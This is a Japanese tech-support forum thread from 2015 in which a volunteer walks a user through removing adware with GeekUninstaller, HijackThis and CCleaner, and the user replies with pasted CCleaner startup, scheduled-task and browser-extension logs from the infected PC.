「download free」をクリック、保存後、解凍してください。
片付ける時はフォルダごと手動で削除してください。

「CCleaner」(通称:CC)
説明↓
http://www.gigafree.net/system/clean/ccleaner.html
http://note.chiebukuro.yahoo.co.jp/detail/n178757
ダウンロード↓
http://www.piriform.com/ccleaner/download/standard
最新バージョンをダウンロードしてください。なお、インストール時におまけのアプリも勧めてくることがありますが、それらはチェック外してインストールは避けてください。
片付けるときはアンインストールしてください。

ここで重要な注意です。
CCは本来は高い性能を持つメンテナンスソフトですが、間違った使い方すると
【Windowsにダメージを与えてしまうおそれもある】
ので、ここでは解析ツールとしてのみ使います。
説明をしっかり読んで、自分が指示した以外の操作はしないように。

そして下記ページは作業開始前に必ず熟読して、必要な場合が出たらそれに沿って対処してください。この対処が必要な事例が増えています。
http://note.chiebukuro.yahoo.co.jp/detail/n335704

準備できたら作業開始です。
なお、このあとの作業で探しても見つからないものはスルーして進めていいですが、指示した対象外の物は絶対にいじらないようによく見て作業してください。

少なくとも下記のアプリは旧バージョンです。
>Adobe Flash Player 16 NPAPI Adobe Systems Incorporated 2015/03/09 6.00 MB 16.0.0.305
>Skype(TM) 7.3 Skype Technologies S.A. 2015/04/23 78.4 MB 7.3.101

各種アプリの更新を怠っただけでも、脆弱性を悪用されて深刻な感染はあっさり起きます。
使うなら最新版に更新してください。使わないアプリならアンインストールが安全です。
他にも旧バージョンないか調べて、あれば同様に更新するか、アンインストールしてください。
それと、下記のフィルタリングソフトの使用期限も確認して、期限切れていれば有料で更新するか、更新しないならアンインストールしてください。
>i-フィルター 6.0 デジタルアーツ株式会社 2011/11/22 20.3 MB 6.00.15.0043

ここでWindowsの標準機能である「システムの復元」での復元ポイントをひとつ、手動で作成しておいてください。
これはこの後の作業で、間違って対象外のものをいじってしまうとそれだけでWindowsに深刻な不具合を起こすこともあるので、万一の際に復元可能にしておくためです。
http://windows.microsoft.com/ja-jp/windows7/create-a-restore-point

今度はPCをセーフモードで起動してください(やり方↓)
http://www.pc-master.jp/sousa/s-safemode.html

セーフモードでGUを使って、下記をアンインストールしてください。
>Bandisoft MPEG-1 Decoder 2012/11/10

>Browsers Apps browser 2014/08/11 1.34.7.29

>deal2dealit "" 2014/11/14

>Foxtab FoxTab 2011/11/22

>NewPlayer 2014/10/28 30.7 MB v2.1.2.8

>PennyBeeUpdate PennyBeeUpdate 2014/10/07

>PepperZip 1.0 PepperWare Co. 2014/08/11 1.0

>SalesMagnet "" 2014/11/19

>SaverAddon SaverAddon 2014/11/15

>Search Protect Client Connect LTD 2014/08/26 2.16.31.75

>Sempre Griot Co.,Ltd. 2011/11/22 5.18 MB 1.2.0

>UltraCoupon UltraCoupon 2014/02/22

続いてセーフモードのままでスタートメニューの「アクセサリ」→「システムツール」から「ディスククリーンアップ」を起動してください。
起動したら対象ドライブでCドライブを選択してスキャンして、表示された中の「ダウンロードされたプログラムファイル」「インターネット一時ファイル」「一時ファイル」の項目だけチェックを入れてから「OK」「ファイルの削除」を押してください。
これを実行すると選択した部分のゴミファイルが掃除されます。

これを実行することで作業時にスキャンで検出される無駄なゴミファイルも減るのでその分かなり時間や解析も楽になるのです。
「ごみ箱」など他の項目にチェックしないのは、間違って正常なファイルを削除しないためと、もし正常なファイルを削除してごみ箱に入れても戻せるようにするための措置です。

HJTを起動させ、スキャンを行ってください。
スキャン結果が表示されましたら、以下の項目にチェックを入れてください。
ただし、特にHJTでの作業は一歩間違えれば簡単にPCが起動しなくなるため、こちらが指示した以外のものは絶対にチェックを入れないでください。
>O20 - AppInit_DLLs: c:\progra~2\searchprotect\searchprotect\bin\spvc32loader.dll

>O23 - Service: Baidu Japanese IME Service_3.5.2.45 (BaiduJP_IME_Service_3.5.2.45) - Unknown owner - (no file)

必要な項目すべてにチェックが入りましたら、Fix checkedをクリックしてください。
探しても見つからないものはスルーして進めていいです。

マイコンピュータのCドライブを開いて、下記のフォルダを探して、見つかればゴミ箱に削除してください。
>c:\progra~2\searchprotect

今度はCCを起動してください。
起動したら、「ツール」→」「スタートアップ」→「Windows」タブを開いてください。
そこで右下の「テキストとして保存」を押すと、表示の内容がログとして保存できるので、ログをデスクトップにでも保存しておいてください。

続いて「InternetExplorer」タブ以下の各タブも順番に開いて、そのログもとっておいてください。
ただし、「コンテキストメニュー」のログは取らなくていいです。

CCの各ログをとったらCCは終了してください。

このあとブラウザを起動して、数時間ほどPC状態を様子見したあと、あらたにHJTとCCでのインストール情報ログを取り直してください。

取り直した両ログと、CCの各ログを返信に貼って、状態報告とともにレスください。
それらを見てから続きの作業を指示します。
  • 悪代官
  • 2015/04/27 (Mon) 19:59:16
Re: すみません
説明ありがとうございます
GeekUninstallerをダウンロードしようとすると
以下の画像のようになってしまうのですがどう知ればよいですか?
  • T・T
  • 2015/04/27 (Mon) 20:48:34
ファイル直リンからDLを
GUのダウンロードページでもアドウェアを勧める表示が出ましたか。
油断も隙もありませんね。

では下記のURL直リンでGUをダウンロードしてください。
http://www.geekuninstaller.com/geek.zip

アクセスしたらファイルのダウンロード表示が出るので、それをデスクトップに保存すればいいです。

なお、自分から次のレスできるのは明日夜あたりになりそうなので、すみませんがご了承ください
  • 悪代官
  • 2015/04/27 (Mon) 21:42:24
Re: パソコン動作緩慢・広告類がひどい
遅れてすみません
一応アドバイスいただいた事をしてみました。
まだ、広告などが出るのですがどうしたら様でしょうか。
また、skypeは更新はすでに自動更新する設定にしているのですが、どうしたら良いでしょうか。
新バージョンをインストールした方が良いのでしょうか?その際に今まで使用した連絡先が消えるなどの危険はあるか教えてください。

有効 HKCU:Run CCleaner Monitoring Piriform Ltd "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
有効 HKCU:Run EPLTarget\P0000000000000000 SEIKO EPSON CORPORATION C:\windows\system32\spool\DRIVERS\x64\3\E_IATIHKJ.EXE /EPT "EPLTarget\P0000000000000000" /M "PX-404A"
有効 HKLM:Run cAudioFilterAgent Conexant Systems, Inc. C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe
有効 HKLM:Run EEventManager SEIKO EPSON CORPORATION "C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe"
有効 HKLM:Run HotKeysCmds Intel Corporation C:\windows\system32\hkcmd.exe
有効 HKLM:Run IgfxTray Intel Corporation C:\windows\system32\igfxtray.exe
有効 HKLM:Run IME14 JPN Setup Microsoft Corporation C:\PROGRA~2\COMMON~1\MICROS~1\IME14\SHARED\IMEKLMG.EXE /SetPreload /JPN /Log
有効 HKLM:Run IntelPAN Intel(R) Corporation "C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe" /tf Intel PAN Tray
有効 HKLM:Run LLHDUSER Intercom, Inc. "C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\llhuser.exe"
有効 HKLM:Run NTTW_OSA_AUS 西日本電信電話株式会社 "C:\Program Files (x86)\NTTW\OSA_Aus\acs.exe" -silent
有効 HKLM:Run Persistence Intel Corporation C:\windows\system32\igfxpers.exe
有効 HKLM:Run Platinum Trend Micro Inc. "C:\Program Files\NTTW\Security\SEC\plugin\Pt\PtSessionAgent.exe" -StartUp
有効 HKLM:Run SmartAudio Conexant systems, Inc. C:\Program Files\CONEXANT\SAII\SAIICpl.exe /t
有効 HKLM:Run SynTPEnh Synaptics Incorporated %ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe
有効 HKLM:Run TCrdMain TOSHIBA Corporation %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
有効 HKLM:Run Teco "%ProgramFiles%\TOSHIBA\TECO\Teco.exe" /r
有効 HKLM:Run ToshibaPlacesGadget TOSHIBA CORPORATION "C:\Program Files (x86)\Toshiba Places Gadget\ToshibaPlacesGadget.exe" -atboottime
有効 HKLM:Run ToshibaServiceStation TOSHIBA Corporation "C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe" /hide:60
有効 HKLM:Run TosNC TOSHIBA Corporation %ProgramFiles%\Toshiba\BulletinBoard\TosNcCore.exe
有効 HKLM:Run TosReelTimeMonitor TOSHIBA Corporation %ProgramFiles%\TOSHIBA\ReelTime\TosReelTimeMonitor.exe
有効 HKLM:Run TosSENotify TOSHIBA Corporation C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe
有効 HKLM:Run TosWaitSrv TOSHIBA Corporation %ProgramFiles%\TOSHIBA\TPHM\TosWaitSrv.exe
有効 HKLM:Run TouchFree TOSHIBA Corporation C:\Program Files (x86)\TOSHIBA\TouchFree\TouchFreeTray.exe
有効 HKLM:Run TPSCMain TOSHIBA Corporation %ProgramFiles%\TOSHIBA\PeakShift\TPSCMain.exe
有効 HKLM:Run TPwrMain TOSHIBA Corporation %ProgramFiles%\TOSHIBA\Power Saver\TPwrMain.EXE
有効 HKLM:Run Trend Micro Client Framework Trend Micro Inc. "C:\Program Files\NTTW\Security\UniClient\UiFrmWrk\UIWatchDog.exe"
有効 HKLM:Run TSleepSrv TOSHIBA %ProgramFiles(x86)%\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe
有効 HKLM:Run TSUScheduler TOSHIBA Corporation %ProgramFiles(x86)%\TOSHIBA\Sync Utility\TosSyncScheduler.exe
有効 HKLM:Run Unattend0000000001{7EEC0247-1AD3-4C6D-95A0-BC5399CB7B8A} AnywhereWorking L.T.D. C:\tosutils\palakidou\palakidou.exe
有効 Startup Common クライアントマネージャV.lnk BUFFALO INC. C:\Program Files (x86)\BUFFALO\clientmgrv\bin\cmvMain.exe


無効 Extension AirDroid Notifier 102 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\imlonnilcaednlloaadgddbjfliioklh\102
有効 Extension Browsers Apps 12260.8815.4569 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdmclgnbhdiklglmmdcaelggigiiigpm\12260.8815.4569_0
有効 Extension FlexibleShopper 4.75 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\flnadehcbdhdllijcpefnpbbipaipbee\4.75
無効 Extension G calize 180 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\peconnficnlajdpgfcjfmhjibkoijlbp\180
有効 Extension HQ-V1.4 14112.9866.7746 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ifohbjbgfchkkfhphahclmkpgejiplfo\14112.9866.7746_0
無効 Extension Internet Speed Tracker 12.9.6.19505 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\kohoehgoafblafjinhplmhcbphgaaobc\12.9.6.19505_0
無効 Extension Pink My Facebook 186 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\okcdpfndmnjdijikpehblfeancekjcgo\186
無効 Extension Shut Up 214 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\oklfoejikkmejobodofaimigojomlfim\214
有効 Extension Trend ツールバー 8.0.0.1257 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohhcpmplhhiiaoiddkfboafbhiknefdf\8.0.0.1257_0
有効 Plugin Adobe Acrobat 10.1.4.38 最初�Eユーザー C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll
有効 Plugin Chrome PDF Viewer 最初�Eユーザー C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.90\pdf.dll
有効 Plugin Chrome Remote Desktop Viewer 最初�Eユーザー internal-remoting-viewer
有効 Plugin Google Update 1.3.21.123 最初�Eユーザー C:\Program Files (x86)\Google\Update\1.3.21.123\npGoogleUpdate3.dll
有効 Plugin Java Deployment Toolkit 6.0.200.2 6.0.200.2 最初�Eユーザー C:\Program Files (x86)\Java\jre6\bin\new_plugin\npdeployJava1.dll
有効 Plugin Java(TM) Platform SE 6 U20 6.0.200.2 最初�Eユーザー C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll
有効 Plugin Microsoft Office 2010 14.0.4730.1010 最初�Eユーザー C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL
有効 Plugin Microsoft Office 2010 14.0.4761.1000 最初�Eユーザー C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL
有効 Plugin Native Client 最初�Eユーザー C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.90\ppGoogleNaClPluginChrome.dll
有効 Plugin Shockwave Flash 11.4.31.110 最初�Eユーザー C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.90\PepperFlash\pepflashplayer.dll
有効 Plugin Silverlight Plug-In 4.1.10329.0 最初�Eユーザー c:\Program Files (x86)\Microsoft Silverlight\4.1.10329.0\npctrl.dll
有効 Plugin Trend Micro Titanium 5.11.0.2107 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\heoldelcflnigdllmlopiefhkkobendj\5.11.0.2107_0\npToolbarChrome.dll
有効 Plugin Windows LiveEPhoto Gallery 15.4.3502.0922_ship.wlx.w4m4 (ship) 最初�Eユーザー C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll

有効 Extension Browsers Apps 1.26.18 Opera Stable C:\Users\Owner\AppData\Roaming\Opera Software\Opera Stable\Extensions\ffhfoagmjcnkolneahbpagjcjjaeofbg\1.26.18_0
有効 Extension HQ-V1.4 1.26.35 Opera Stable C:\Users\Owner\AppData\Roaming\Opera Software\Opera Stable\Extensions\lclfgoiloocdgalcloalohidgnfcbpin\1.26.35_0


有効 Task 14ee8834-7bd6-4eba-bb20-1e498ae70e2e-11 C:\Program Files (x86)\HQ-V1.4\14ee8834-7bd6-4eba-bb20-1e498ae70e2e-11.exe /XAljV=HY2lakge0jvtbGGe5PpXK3/dQWihWPr95uq/bBYrIc7LyKhycS1SCiZNXuH3TACgIWN9au1r+vPaVjikRFRZ18DmLXRaVJT53FISREEqH5hN+KswWe8gko5HsANSIHjzfbRzC9IVfRWOIj8WuEqpxfLuLk941UPEUrGgh3Ef84co58V4lUioKrr/hjHsKWzzlxu/0oFGgkQcT4kiu46bpkrU1Ijmds8GvudWMu+xUbjhNkAxOsMsKuiBIAoBF4VO/dJmjl1h2XCWj+W9pV5/vQcHDb2kpLJyQGZffWMEqKSjUxMTZVkVjjR7ozTolPZjyM8zPSmEpLb+0OU+UfsAC5K/Ykwbysfwez2+wkyHgpI1Ju8yvP+n3vwdUQGSjrnvAfWD4Y1ZVq0YdReVHl3e27dgXAsZWliBWpbATnBj50EDJIqQmwzagiC+DRLfJcNI5JL/IaxlK3s271tu1gb+XmgalF6lr6aGqTD+O4HsXzgPVoAVs3fs45ffIKnexmqCbd9BKsMPWke5kcZglC60vGTiDASBMYdvht3wTFldwQdpm77MQY+3SjumQ7sdE4yOFjhXJbg44jkCWMSenGLEjUItMHWiH8eQO3Lp8dLUkJwb7PLSGNPb7OWZ4WJm7UdJ3n6lELRhmiRBPJ2fD1zBsUMaNgNu8ET+El6XBxTuuagBHYYfnEJOkxCH0m4Y05JS0/7iU91nliLaAn8Z1DsB5P6f0PVuWeKmb9eonLSxdqhKU2gxNcjcrudthMVcrgsidQXgfkJAg9tumLL4ZA29qBvydrRmla19tisZViuBNtBxMvFNoXJ/At3lsCF38uzS/VfB3tbVM75IiCzShCb9Y8AgnBAh4JbN2UTGPrWW/6TqnrlHxEew4c6X681byyQkGrQn1AOYAxSe60EuuMs4GH6/Ds+UFNW9M01RqKod4z7+mo98CoQ5y1h+27dW/GbGqF5fkkfiUmNFgecJLSM6myRXFqd1I4v5CM7qe/6oODRWVC07HrtNMWhQXKHAia98vGIOdcURPO3/tgc6r0XDw6GSRwLofjChwwbraF9+Nn9bQhKS0vcWHoubtru5kkiqTJ/91KC8Xw6baa8USBXGL78j0ntLGHtHQoFveuhCg8txRIiRM/MHiVfDdERz3PUZ+rHFkI/rkGmsFFh3kYSY+dBFjhxm8tIUHmKbZiLsxw1mPLKDnd+iKA6vihiSqHx8pWF0o5E/hUM216tllnBf6/zKhx3b7W8gFoobKLRX5FyxEFeBuS2HCIomWyDvFgM+Q+yG98EJGufN23u4IeRugYRDIaR+jOVJvO8ijLa1JcO/qO0v5XT0ixwK+JGrzD1htba/pTrDvYwGvaH7s29jmR+LlOq2UFgiHfYv9FoQb6zYz7e29EqAPnc5qytTFuJW2C7/CE10LROZ5vM58cLo3OmdjY83HdjuVwKhe1XfB6Qi9bAsppHZnrmRcq22cfUJnFBqLWy9YpwX2ufDrYGkADOarlqu94eNUG6qaO6ygx1p5+Nsuss6+UzszffWfSj7
有効 Task 14ee8834-7bd6-4eba-bb20-1e498ae70e2e-3 C:\Program Files (x86)\HQ-V1.4\14ee8834-7bd6-4eba-bb20-1e498ae70e2e-3.exe /XAljV=hpjCgC6ZaECmG1XheHRnE0/IvydM4QBVBkc238SQ+QDR6BY9oQ8+eaP97gS3EYbobIPtYHVwdT7Mwp5lrsjwqftlwBYeqCnRRJOg/d2EN6pJMDq32EpWcArNjfYZ2ZTWMHjyESVpP3JUv1x/ZXQzMQPeAvg3FybHeV5KHGCtWaU5tG2cCiqrL+9rsQ2+R0eLvrU74v1bVDx+Q4YnRSlZ4VfW6mXJqqnvIwoy4nScZlJRA6/XbX1XWl5bn05g98a6fODm+SOf5uLrCNUMR+mb8xTdap8meZtOWHEYBESkdtIuVB67KGsRdHBv4aiBTXJiXOeZNgjD76dzgptpGqFb1TyPthTLpqD5xbgQD4udrVQnfs+/2cHInZ8V25abk/GOwrOa0lnEwzYhwwYhsDyuVRkuCdA3NB/v6EQtiGScJ3hCwjneBOUCD1udg1PPEBQLXOTAQJhslJfnkYiVqZfgW+0Pr7OVgHyn3zln+NUOBVUW/bAKNG6jwUOdlBbkOViqujn4iK0/c5mPE35OE0H0XhMI0tt8g+VH6YQpAFvwsnZxdiY0cb5VMMVh+3rzl0qNaYlerVF4BLnYp4FaPLeDC4GUEpbpDvQ5AixeJOxbu6QD9kcctLLtg9zrPnYB3L92PB8165rPOqZzPCiArJJ6we3Lk7rjipyqyIa7r3yVhPLFVeNZh4E0+P0BFmk/0EgKJH2LMT4o/VsWJBTPbIItG7/w1xno/a3IRQYoMRrdB70Ssz4+AnF1WBzDmCwdgTSbLAN9cX0vIsZMpssN0RIOhoUSq30ipC0pILyXFBEPvH2g0/6tNU/dCQy8BOerXbBkykUZ2WJrHiZOehsLsmLTRQaKAn76WwHK0WZehTRGsu9Bv4WSPjScFCzq3nC1OTXTEIwYe32xZgv9JAxbkpfe0wjIpCE0RrT60qK/zpIw9FNlyD7R4amjHVKOZ5vsh9c+op+RuCkffDQWMiuzy50k6UXjujrNnZsthY7yc3jp9t57gRDBEOEIVleYiv09U+hO
有効 Task Adobe Flash Player Updater Adobe Systems Incorporated C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
有効 Task ASP "C:\Program Files (x86)\RCP\systweakasp.exe" /verysilent
有効 Task CCleanerSkipUAC Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
有効 Task ConfigFree Startup Programs TOSHIBA CORPORATION C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe
有効 Task Driver Booster SkipUAC (Owner) C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe /skipuac
有効 Task GoogleUpdateTaskMachineCore Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
有効 Task GoogleUpdateTaskMachineUA Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
有効 Task PC SpeedScan Pro_Owner-PC@Owner C:\Program Files (x86)\Ascentive\PC SpeedScan Pro\PCSpeedScan.exe
有効 Task Performance Center@Logon C:\Program Files (x86)\Ascentive\Performance Center\APCMain.exe -m
有効 Task Performance Center_Owner-PC@Owner C:\Program Files (x86)\Ascentive\Performance Center\APCMain.exe
有効 Task Uninstaller_SkipUac_Owner IObit C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe /UninstallExplorer
有効 Task Yahoo! Search C:\Users\Owner\AppData\Local\Pay-By-Ads\Yahoo! Search\1.3.15.4\dsrlte.exe
有効 Task Yahoo! Search Updater C:\Users\Owner\AppData\Local\Pay-By-Ads\Yahoo! Search\1.3.15.4\dsrsetup.exe


有効 Directory Advanced SystemCare
有効 Directory IObitUnstaler IObit C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight64.dll
有効 Drive Advanced SystemCare
有効 Drive Ulead UDF Driver Ulead Systems, Inc. c:\Program Files (x86)\Common Files\Ulead Systems\DVD\USIShex.dll
有効 File Advanced SystemCare
有効 File IObitUnstaler IObit C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight64.dll
有効 File {48F45200-91E6-11CE-8A4F-0080C81A28D4} Trend Micro Inc. C:\Program Files\NTTW\Security\UniClient\UiFrmwrk\tmdshell.dll
有効 Folder IObitUnstaler IObit C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight64.dll
有効 Folder {48F45200-91E6-11CE-8A4F-0080C81A28D4} Trend Micro Inc. C:\Program Files\NTTW\Security\UniClient\UiFrmwrk\tmdshell.dll

有効 Extension OneNote に送る Microsoft Corporation C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
有効 Extension OneNote に送る Microsoft Corporation C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
有効 Extension OneNote リンク ノート(K) Microsoft Corporation C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
有効 Extension OneNote リンク ノート(K) Microsoft Corporation C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
有効 Extension TOSHIBA Bulletin Boardへ追加 TODO: <会社名> C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll
有効 Extension TOSHIBA Bulletin Boardへ追加 TODO: <会社名> C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom64.dll
有効 Extension このコンテンツを引用 Microsoft Corporation C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
有効 Extension 故障かな?と思ったら・・・ 西日本電信電話株式会社 C:\Program Files (x86)\NTTW\OSA_SupportTool\start_w.exe
無効 Helper E-Photo SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Photo\EPTBL.dll
無効 Helper E-Web Print SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll
有効 Helper ExplorerWnd Helper IObit C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll
無効 Helper Office Document Cache Handler Microsoft Corporation C:\PROGRA~2\MICROS~4\Office14\URLREDIR.DLL
無効 Helper Office Document Cache Handler Microsoft Corporation C:\PROGRA~1\MICROS~2\Office14\URLREDIR.DLL
無効 Helper TmBpIeBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe32.dll
無効 Helper TmBpIeBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe64.dll
有効 Helper TmIEPlugInBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg32.dll
有効 Helper TmIEPlugInBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg.dll
無効 Helper TOSHIBA Media Controller Plug-in <TOSHIBA> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll
無効 Helper TOSHIBA Media Controller Plug-in <TOSHIBA> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\x64\TOSHIBAMediaControllerIE.dll
無効 Helper TSToolbarBHO Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
無効 Helper TSToolbarBHO Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\plugin\ToolbarIE64\ToolbarIE.dll
無効 Helper Windows Live ID Sign-in Helper Microsoft Corp. C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
無効 Helper Windows Live ID サインイン ヘルパー Microsoft Corp. C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
無効 Helper 東芝プレイス ダイジェストワード用ライブラリ TOSHIBA CORPORATION C:\Program Files (x86)\Toshiba\Toshiba Places Digestword\TPBIEAddon.dll
無効 Helper 東芝プレイス ダイジェストワード用ライブラリ TOSHIBA CORPORATION C:\Program Files (x86)\Toshiba\Toshiba Places Digestword\TPBIEAddon64.dll
無効 Toolbar E-Photo SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Photo\EPTBL.dll
無効 Toolbar E-Web Print SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll
無効 Toolbar セキュリティツールバー Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
無効 Toolbar セキュリティツールバー Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\plugin\ToolbarIE64\ToolbarIE.dll


有効 Extension Browsers Apps 0.95.18 browser default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\herman.thorne45@outlook.com
有効 Extension ClickForSale 1.9 default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\Na@4skpeF6a.org
無効 Extension E-Web Print 1.09.00 SEIKO EPSON CORPORATION default C:\Program Files (x86)\Epson Software\E-Web Print\Firefox Add-on
有効 Extension Hold Page 1.0.1 Hold Page default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\{15738250-181b-41cd-b01d-621a833a541c}.xpi
有効 Extension ProShopper 4.87 default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\w1@bVfSQOc5.com
有効 Extension SilentBlockschuzakjp 0.95.949 Schuzak default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\SilentBlock@schuzak.jp
無効 Extension Skype Click to Call 7.3.16540.9015 Microsoft Corporation default C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi
無効 Extension Trend Micro BEP Firefox Extension 7.5.0.1144 Trend Micro default C:\Program Files\NTTW\Security\AMSP\Module\20002\7.5.1144\7.5.1144\firefoxextension
無効 Extension Trend Micro NSC Firefox Extension 6.8.0.1096 Trend Micro default C:\Program Files\NTTW\Security\AMSP\module\20004\FxExt\firefoxextension
有効 Extension websaver 6.2 default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\vN6lrq0@I.org
無効 Extension セキュリティツールバー 6.11.0.3085 繝医Ξ繝ウ繝峨・繧、繧ッ繝ュ default C:\Program Files\NTTW\Security\SEC\UIFramework\Toolbar\firefoxextension
有効 Plugin Adobe Acrobat 11.0.10.32 default C:\Program Files (x86)\Adobe\Reader 11.0\Reader\browser\nppdf32.dll
有効 Plugin Microsoft Office 2010 14.0.4730.1010 Microsoft Corporation default C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL
有効 Plugin Microsoft Office 2010 14.0.4761.1000 Microsoft Corporation default C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL
有効 Plugin Nexon Game Controller 1.0.1.2 Nexon default C:\ProgramData\NexonJP\NGM\npNxGameJP.dll
有効 Plugin Shockwave Flash 16.0.0.305 default C:\windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll
有効 Plugin Silverlight Plug-In 5.1.30514.0 Microsoft Corporation default c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll
有効 Plugin Windows LiveEPhoto Gallery 15.4.3502.922 Microsoft Corporation default C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll


Adobe Flash Player 17 NPAPI Adobe Systems Incorporated 2015/04/27 6.00 MB 17.0.0.169
Atheros Communications Inc.(R) AR81Family Gigabit/Fast Ethernet Driver Atheros Communications Inc. 2012/04/24 1.0.0.36
BookPlaceReader Toshiba Book Place 2012/04/24 79.8 MB 1.6.80
BUFFALO AirStation倍速設定ツール(アンインストール) 2014/05/19
BUFFALO クライアントマネージャV をアンインストール BUFFALO INC. 2014/05/19 9.87 MB 1.4.10
CCleaner Piriform 2015/04/27 5.05
Conexant HD Audio Conexant 2012/04/24 8.51.1.0
Corel Digital Studio SE Corel Corporation 2012/04/24 1.79 GB 1.5.10.433
Epson Download Navigator SEIKO EPSON CORPORATION 2012/05/05 705 KB 1.0.1
Epson E-Photo SEIKO EPSON CORPORATION 2012/05/05 1.3.0.0
Epson E-Photo Plug-in for PMB(Picture Motion Browser) SEIKO EPSON CORPORATION 2012/05/05 1.00.0000
Epson E-Web Print SEIKO EPSON CORPORATION 2012/05/05 11.7 MB 1.09.0000
Epson Event Manager SEIKO EPSON CORPORATION 2012/05/05 40.5 MB 2.50.0000
EPSON PX-404A プリンター アンインストール SEIKO EPSON Corporation 2012/05/05
EPSON PX-404A ユーザーズガイド 2012/05/06
EPSON Scan Seiko Epson Corporation 2012/05/05
EPSON Scan OCR コンポーネント SEIKO EPSON Corp. 2012/05/05 1.20.0000
Google Chrome Google Inc. 2015/03/21 42.0.2311.90
Intel(R) Management Engine Components Intel Corporation 7.0.0.1144
Intel(R) Processor Graphics Intel Corporation 8.15.10.2509
Intel(R) Rapid Storage Technology Intel Corporation 10.1.2.1004
